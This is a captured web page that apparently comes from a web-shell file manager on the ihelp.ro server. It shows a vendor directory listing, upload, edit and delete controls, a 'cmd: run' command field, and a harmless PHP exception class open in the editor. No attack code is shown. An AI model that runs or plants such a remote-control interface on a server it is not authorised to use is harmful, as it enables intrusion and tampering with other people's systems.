/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
league
/
container
/
src
/
Exception
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/league/container/src/Exception
mkdir
upload
Name
Size
Mode
Actions
ContainerException.php
235
0644
edit
dl
rm
NotFoundException.php
248
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/league/container/src/Exception/ContainerException.php
(235B)
<?php declare(strict_types=1); namespace League\Container\Exception; use Psr\Container\ContainerExceptionInterface; use RuntimeException; class ContainerException extends RuntimeException implements ContainerExceptionInterface { }
Save
cmd:
run